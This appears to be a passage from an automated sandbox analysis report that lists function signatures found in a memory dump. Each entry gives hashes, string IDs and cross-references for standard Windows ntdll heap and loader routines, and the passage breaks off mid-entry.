                      • Kernel-MUI-Language-Allowed, xrefs: 01633DC0
                      • Kernel-MUI-Number-Allowed, xrefs: 01633D8C
                      • Kernel-MUI-Language-Disallowed, xrefs: 01633E97
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                      • API String ID: 0-258546922
                      • Opcode ID: 6725f12d423d8326447c862f200f8d537a7c31247b54521cad2ed9c7c0061660
                      • Instruction ID: 84063ce7a656c5c34615c87a0e3f82173667e252c1451ddaf401c219e724ee58
                      • Opcode Fuzzy Hash: 6725f12d423d8326447c862f200f8d537a7c31247b54521cad2ed9c7c0061660
                      • Instruction Fuzzy Hash: EBF13A72D00619EBCB16DF98CD80AEEBBBEFF58650F14416AE505A7350DB349E01CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                      • API String ID: 0-188067316
                      • Opcode ID: 4c159c11eb69f13a9dc181f861bd957682f1910306bccf1b92bddb0a063ca1e8
                      • Instruction ID: f1d267a009c9c3ff19f9290a593ceee4999fb9d7bc8278f5f3e1f401d788f02e
                      • Opcode Fuzzy Hash: 4c159c11eb69f13a9dc181f861bd957682f1910306bccf1b92bddb0a063ca1e8
                      • Instruction Fuzzy Hash: D7014C32142A51EED32AA76DEC0DF537BA4DB01B31F29842DF00547781CBE49494C728
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • HEAP: , xrefs: 016922E6, 016923F6
                      • HEAP[%wZ]: , xrefs: 016922D7, 016923E7
                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01692403
                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016922F3
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                      • API String ID: 0-1657114761
                      • Opcode ID: 797aeedcdbbd17f30b254386bf4459370ec0da079ccdcceaba0ea770fbd39c76
                      • Instruction ID: 6cbbb5fd96b32e3e380146cec5e72e02796218d1aeac8ab3811fe86483317cba
                      • Opcode Fuzzy Hash: 797aeedcdbbd17f30b254386bf4459370ec0da079ccdcceaba0ea770fbd39c76
                      • Instruction Fuzzy Hash: 03D1C274640645AFEB19CFA8C990BBABBF6FF48300F15856DD9579B342E330A981CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                      • API String ID: 2994545307-2586055223
                      • Opcode ID: e1b45d452ac4524cc7bdeba4f56cc2f7012735850a25deed1f38ea4fa1280f60
                      • Instruction ID: d1e5a9e87a6a3a289513d56bc0cdc551f2bb00536d3e1391c7e4b603667a2cf7
                      • Opcode Fuzzy Hash: e1b45d452ac4524cc7bdeba4f56cc2f7012735850a25deed1f38ea4fa1280f60
                      • Instruction Fuzzy Hash: EB510532245682AFE712DBA8CC48F677BE9EF85760F180868F952CB391D734D805CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • minkernel\ntdll\ldrsnap.c, xrefs: 0169933B, 01699367
                      • LdrpFindDllActivationContext, xrefs: 01699331, 0169935D
                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01699357
                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0169932A
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                      • API String ID: 0-3779518884
                      • Opcode ID: def2b98634658c98af58b39d9f5d21dbe265d9de407243c21a7bab3c2e3caa35
                      • Instruction ID: 9e6c8140a968b58666795a693f75d30df32a553a6cbb64c0b3c5846437c2d1b4
                      • Opcode Fuzzy Hash: def2b98634658c98af58b39d9f5d21dbe265d9de407243c21a7bab3c2e3caa35
                      • Instruction Fuzzy Hash: C0417D31A003119FEFB6AB0FCC49A3677BDBB40318F06856DDD4497A92E7B05C819781
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                      • API String ID: 2994545307-336120773
                      • Opcode ID: c8baa1472cba264fee9725e2df9140826eb689fc66ddc401cde81c47dc783aff
                      • Instruction ID: 18e30b1244c23a92d2623dd536444d3fa822626a83eadb139402a13f8910175b
                      • Opcode Fuzzy Hash: c8baa1472cba264fee9725e2df9140826eb689fc66ddc401cde81c47dc783aff
                      • Instruction Fuzzy Hash: 4B31E031202514AFD322DBADCC8DF6777E9EB04631F254259F906DB285DA70E884CB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                      • API String ID: 0-3178619729
                      • Opcode ID: 1befcb687715da1fee43f63a51106db8a63a7022c7e3cbac19d260acb69e26c6
                      • Instruction ID: 424ce0efc8fce39af467f509e2dfc6a38ca5b1867c4f6cf4a4ac87e81f2a50c9
                      • Opcode Fuzzy Hash: 1befcb687715da1fee43f63a51106db8a63a7022c7e3cbac19d260acb69e26c6
                      • Instruction Fuzzy Hash: 3322F3706002469FEB25CF6DCC94B7ABBB9EF46714F28856DE8468B382D731D881CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • minkernel\ntdll\ldrsnap.c, xrefs: 01689C28
                      • LdrpDoPostSnapWork, xrefs: 01689C1E
                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01689C18
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                      • API String ID: 2994545307-1948996284
                      • Opcode ID: 2cf09ecb39b1beda4ec25a1004a501f1d63ad770d5f1e77840f00eacaa747797
                      • Instruction ID: 542b62845ac682c51002d892b4db49df887dba626b8e675b289206334d860df1
                      • Opcode Fuzzy Hash: 2cf09ecb39b1beda4ec25a1004a501f1d63ad770d5f1e77840f00eacaa747797
                      • Instruction Fuzzy Hash: 3491E171A002169FEB29DF5DDC81ABAB7BAFFC4314B55426DE905AB241D730AE01CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • HEAP: , xrefs: 0169A0BA
                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0169A0CD
                      • HEAP[%wZ]: , xrefs: 0169A0AD
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                      • API String ID: 0-1340214556
                      • Opcode ID: 2eb92c21509241971cb10ff2461554eda5951bc65eaca046404442444dcbe535
                      • Instruction ID: 902e2d581f73721d2451329116085639bfbee978e78a3118188295a23d8caecc
                      • Opcode Fuzzy Hash: 2eb92c21509241971cb10ff2461554eda5951bc65eaca046404442444dcbe535
                      • Instruction Fuzzy Hash: 50810632204684EFEB26DBACCD94BA9BBF8FF05314F1442A9E95187392D774E940CB10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-1334570610
                      • Opcode ID: 4b23acfb07c71fbb062acfcf08f00f37bd6c8c445bd5fd5134397a2cee57466b
                      • Instruction ID: 6042d5601a79bb971b9eff710753697e2ada9c3e60dfea9785d8f0e11434b3a5
                      • Opcode Fuzzy Hash: 4b23acfb07c71fbb062acfcf08f00f37bd6c8c445bd5fd5134397a2cee57466b
                      • Instruction Fuzzy Hash: E661B270600241DFEB29DF28CC85B6ABBE6FF44314F19856DE8498B346D770E892CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01689891
                      • minkernel\ntdll\ldrmap.c, xrefs: 016898A2
                      • LdrpCompleteMapModule, xrefs: 01689898
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                      • API String ID: 0-1676968949
                      • Opcode ID: 90c536bfc4825e2e4964e89f0c7a41fc099487e8df42b888999c078a08a8c0ee
                      • Instruction ID: 7b99ad89cdb24a8f306c764da529a9a409f493f13342ee7a4a52c6fb8a39bb84
                      • Opcode Fuzzy Hash: 90c536bfc4825e2e4964e89f0c7a41fc099487e8df42b888999c078a08a8c0ee
                      • Instruction Fuzzy Hash: 185102B2A04746DBEB26DB6CCD44B2A7BE5FB80314F040AA9E9519B7D1D730ED01CB61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • HEAP: , xrefs: 016D255C
                      • HEAP[%wZ]: , xrefs: 016D254F
                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 016D256F
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                      • API String ID: 0-3815128232
                      • Opcode ID: dfbfbc1ac80459bb9f092a2cba36dfaf4ef255307949cba428a9fe2f65f6c8b9
                      • Instruction ID: ebec3ea87910d809e6f3bcdc52a1e6736063465e59eb73d53716fb7e1b85440b
                      • Opcode Fuzzy Hash: dfbfbc1ac80459bb9f092a2cba36dfaf4ef255307949cba428a9fe2f65f6c8b9
                      • Instruction Fuzzy Hash: 0C5103349012608AE375CF2ECC68B727BF1EB48645F55889DECC28B285D776D887DB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • InstallLanguageFallback, xrefs: 0162E6DB
                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0162E68C
                      • @, xrefs: 0162E6C0
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                      • API String ID: 0-1757540487
                      • Opcode ID: 6926b86c86b67588c578c202c68cd819c1853080fe98d5058a1a97f905eacf44
                      • Instruction ID: 1ca0ffe770921a8ea183744744c34b990a89ae19c6b0f32f754d06765d11b189
                      • Opcode Fuzzy Hash: 6926b86c86b67588c578c202c68cd819c1853080fe98d5058a1a97f905eacf44
                      • Instruction Fuzzy Hash: F251C1726053169BD710EF68C850A7BB3E9AF98714F040A6EF986D7340EB35D904CBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-2558761708
                      • Opcode ID: 5c8df625c62305eaab131ae0e41cbff6e552fd583a1b46c75b5adc4358f1460b
                      • Instruction ID: 1c19a30d87cdb88cf0e422622f0380a4a9138c0db6e9af1084dd03b81237c4fb
                      • Opcode Fuzzy Hash: 5c8df625c62305eaab131ae0e41cbff6e552fd583a1b46c75b5adc4358f1460b
                      • Instruction Fuzzy Hash: 7C11E2353055029FEB2DDB19CC94B36B7AAEF41621F29812DE40BCB381D730D881CB49
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: `$`
                      • API String ID: 0-197956300
                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                      • Instruction ID: ab0ec8ac83e067ef5419767d180b486fc131d4215f4ae32044b96e766b239ba6
                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                      • Instruction Fuzzy Hash: DF9192312053429FEB24CF69CC49B27BBE6AF84714F148A2DF695CB290E776E904CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: Legacy$UEFI
                      • API String ID: 2994545307-634100481
                      • Opcode ID: 39fc742b8cfa7d8ca342d030cd5787d090356ba5db6685da7b16ead7f8a85346
                      • Instruction ID: 35405bca14efc40fca0285ba933405ccaf63f407cfbe37c2476a9a178db48fb3
                      • Opcode Fuzzy Hash: 39fc742b8cfa7d8ca342d030cd5787d090356ba5db6685da7b16ead7f8a85346
                      • Instruction Fuzzy Hash: F0516D71A006099FDB25DFA8CC40AAEBBF9BF88700F54406DE60AEB251E7719D01CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: _vswprintf_s
                      • String ID:
                      • API String ID: 677850445-0
                      • Opcode ID: a83c2ff30b5d141fc5b6349bc8294aae6a40a976bf7cbb982bdac26927e09299
                      • Instruction ID: 8f74e3fa7af2f58e988d35bf9dcbcaa4d2c2fd370ead91ea9d8f653130d9295d
                      • Opcode Fuzzy Hash: a83c2ff30b5d141fc5b6349bc8294aae6a40a976bf7cbb982bdac26927e09299
                      • Instruction Fuzzy Hash: 7F51B371D1025A8ADF31EF68CC44BAEBBB1AF04710F1142ADD859AB382DB718945CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0164B9A5
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 885266447-0
                      • Opcode ID: f0c4c707dae90d387b0e92b134bd83a732f42ee7480609525f461d05ca6431f6
                      • Instruction ID: 5b457fb3411fa6874a1398c9b420879bef3c9887100fa8fde3fa73108218fd0a
                      • Opcode Fuzzy Hash: f0c4c707dae90d387b0e92b134bd83a732f42ee7480609525f461d05ca6431f6
                      • Instruction Fuzzy Hash: 83515B71A08341CFC720CF6DC88092ABBFAFB88650F14896EFA9597355D771E844CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: PATH
                      • API String ID: 0-1036084923
                      • Opcode ID: 0d6c06bb376d882a6e0c1084f0995554ac257d80c4fa305479100c461469e921
                      • Instruction ID: dbf957dfdca679d70d0a6deac8c28a015ac42d0d8023ba950da50cf84d3bcaf5
                      • Opcode Fuzzy Hash: 0d6c06bb376d882a6e0c1084f0995554ac257d80c4fa305479100c461469e921
                      • Instruction Fuzzy Hash: CCC15AB1E00219DBDB65DF99DCA1ABEBBB5FF58710F04402DE901AB350DB34A942CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0169BE0F
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                      • API String ID: 0-865735534
                      • Opcode ID: 64732b5f389aba358531cf5125e85502d3179a33c80a88a1d06efc26124f88bd
                      • Instruction ID: be721b9357b276afb43cbbaf3af4aefcd44d32d31b1f22ba88705462851701b7
                      • Opcode Fuzzy Hash: 64732b5f389aba358531cf5125e85502d3179a33c80a88a1d06efc26124f88bd
                      • Instruction Fuzzy Hash: B1A1D372B00606CBEB65DB6CCC50B7AB7AAAF44720F0445BDED46DB791DB34D8428B90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: RTL: Re-Waiting
                      • API String ID: 0-316354757
                      • Opcode ID: f6c31af095f280c9ffb20cdce670076f30d0bf30b61617846559eef37041df4d
                      • Instruction ID: 68cbf1464b92325758f6f69cec5b908bc7b86323e456486a8149e8617371c872
                      • Opcode Fuzzy Hash: f6c31af095f280c9ffb20cdce670076f30d0bf30b61617846559eef37041df4d
                      • Instruction Fuzzy Hash: 62612331A00A15DFEB32EB6CCC90B7EBBA6EB40724F1406ADE961973C1C7349941CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: `
                      • API String ID: 0-2679148245
                      • Opcode ID: f4d7f175287be0bb066c2340010f7fdb012ab99dab798cdb7251eea1ac990e0c
                      • Instruction ID: 829cfeedf9c29a5831d429f0bc2e8dedaf21c81c6750806468f8d247a39fa4f1
                      • Opcode Fuzzy Hash: f4d7f175287be0bb066c2340010f7fdb012ab99dab798cdb7251eea1ac990e0c
                      • Instruction Fuzzy Hash: 08519D713043829FD324DF28DD84B1BBBE6EB85754F040A6CFA9697291DB70E805CB62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                      • Instruction ID: e08b409f409e7132bbdf080632c2292c18c6b2e95213126d04cc9f0440189dbe
                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                      • Instruction Fuzzy Hash: 66517A71504711AFC320DF69C840A6BBBF9FF48750F00892EFA9597690E7B4E904CBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: BinaryHash
                      • API String ID: 0-2202222882
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: `
                      • API String ID: 0-2679148245
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: BinaryName
                      • API String ID: 0-215506332
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: WindowsExcludedProcs
                      • API String ID: 0-3583428290
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Actx
                      • API String ID: 0-89312691
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • Critical error detected %lx, xrefs: 016D8E21
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Critical error detected %lx
                      • API String ID: 0-802127002
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 016BFF60
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                      • API String ID: 0-1911121157
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1ae6dfbf014f66fb8614edc15360fd5777dfe8f504042597d0813a5fb51eacaa
                      • Instruction ID: 6580b97a50c3ced4978322007b87620b9cb4deddf92c832d8b3ddf744d38607d
                      • Opcode Fuzzy Hash: 1ae6dfbf014f66fb8614edc15360fd5777dfe8f504042597d0813a5fb51eacaa
                      • Instruction Fuzzy Hash: FA4237759002298FDB24CF68CC80BA9BBB1FF49304F1581AEDA4DAB342D7759A85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd1195d881ceccfe6c2515aa8f17b3b759581917388a3b8a44e62192f9eec64b
                      • Instruction ID: 5f90dc378780ce26ca876332af912a2b20dc6ba2bb9cde9b5169c1eb9d742bfa
                      • Opcode Fuzzy Hash: dd1195d881ceccfe6c2515aa8f17b3b759581917388a3b8a44e62192f9eec64b
                      • Instruction Fuzzy Hash: F6F17C706082118BD724DF19C891B7AB7E1FF99714F04892EF986CB750EB35D881CB52
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3cd4a08fadf0ef197ed62e6566153dc7af771d09e25ec833b198242e4988c199
                      • Instruction ID: fe53b5f4ff7270c1b711d1a3f2c75ede668cd0dafacbbbe14b9b28f3efacdbca
                      • Opcode Fuzzy Hash: 3cd4a08fadf0ef197ed62e6566153dc7af771d09e25ec833b198242e4988c199
                      • Instruction Fuzzy Hash: 24F1D135608341DFEB66CB2CCC5076B7BE6AB85364F04891EEE969B381D734D841CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a9e4bc780eb4c73ff03b1cd94135fd9ca92ecb00e6460c6b3b9ed7fff2361d41
                      • Instruction ID: 63b70bddec4a4154a76a6f74f017297fbc52b43f5c977f6fb544f91ef3b508b0
                      • Opcode Fuzzy Hash: a9e4bc780eb4c73ff03b1cd94135fd9ca92ecb00e6460c6b3b9ed7fff2361d41
                      • Instruction Fuzzy Hash: D0E1CE70A0125A8FEB35DF6CCC90BB9BBB2BF86314F4542ADD90997391D730A981CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5744675362da91c9734312dce856c424de496282beb9180d3e50edec905f097e
                      • Instruction ID: 881dfcfcd1ab021e7dcb6bbea2fe75ac2ee13d719d91e0f2e3cf4a413598ece7
                      • Opcode Fuzzy Hash: 5744675362da91c9734312dce856c424de496282beb9180d3e50edec905f097e
                      • Instruction Fuzzy Hash: 9BB13C70E00219DFDB25DFA9CD84AEEBBBABF85304F10422DE505AB345D774A945CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 057adf4452c98c57417b0e2225367bcd35d053d379178a882dc84130a90e0c1a
                      • Instruction ID: ec69cb211479a199d8f05a1cd857bcf5bcc93c6cd884b3b7ea9c23aefe07e3fe
                      • Opcode Fuzzy Hash: 057adf4452c98c57417b0e2225367bcd35d053d379178a882dc84130a90e0c1a
                      • Instruction Fuzzy Hash: 54C113755083818FD755CF28C980A5AFBF1BF88304F148A6EF99A8B362D771E945CB42
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 38cc3e8da8a100694d577ee98a1dd68d9caa1d6d3be0c7cbcd01c2eb264795d3
                      • Instruction ID: a248b0550df47f67fdf1be500bc9e62cce20075a9eebb5429fec8f84360c4775
                      • Opcode Fuzzy Hash: 38cc3e8da8a100694d577ee98a1dd68d9caa1d6d3be0c7cbcd01c2eb264795d3
                      • Instruction Fuzzy Hash: BD910132E00615EFEF329A6CCE44BAD7BA9AB05724F050265FE10AB2D1DB74DD02C785
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8d6957365b1633d69853dcbb277fe582d94fb654e22ca3e0fd43f516f5018125
                      • Instruction ID: aea53e7b683cbcfab525b1baa9e05b9e30bbd0a111c8c10ad0b602dc80fa92f4
                      • Opcode Fuzzy Hash: 8d6957365b1633d69853dcbb277fe582d94fb654e22ca3e0fd43f516f5018125
                      • Instruction Fuzzy Hash: 88819D756242068BDF26CE58CC80A7AB7ADFF84250F14496EEE459B345D334ED41CFA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd04bbafea35fa62260ec776fd53676790801300a12737a460bf27a65606392b
                      • Instruction ID: 3aafd0da5c6b6e0fa222a3a056c99d5644905ae77a8a74faf356e9be1d42dd65
                      • Opcode Fuzzy Hash: cd04bbafea35fa62260ec776fd53676790801300a12737a460bf27a65606392b
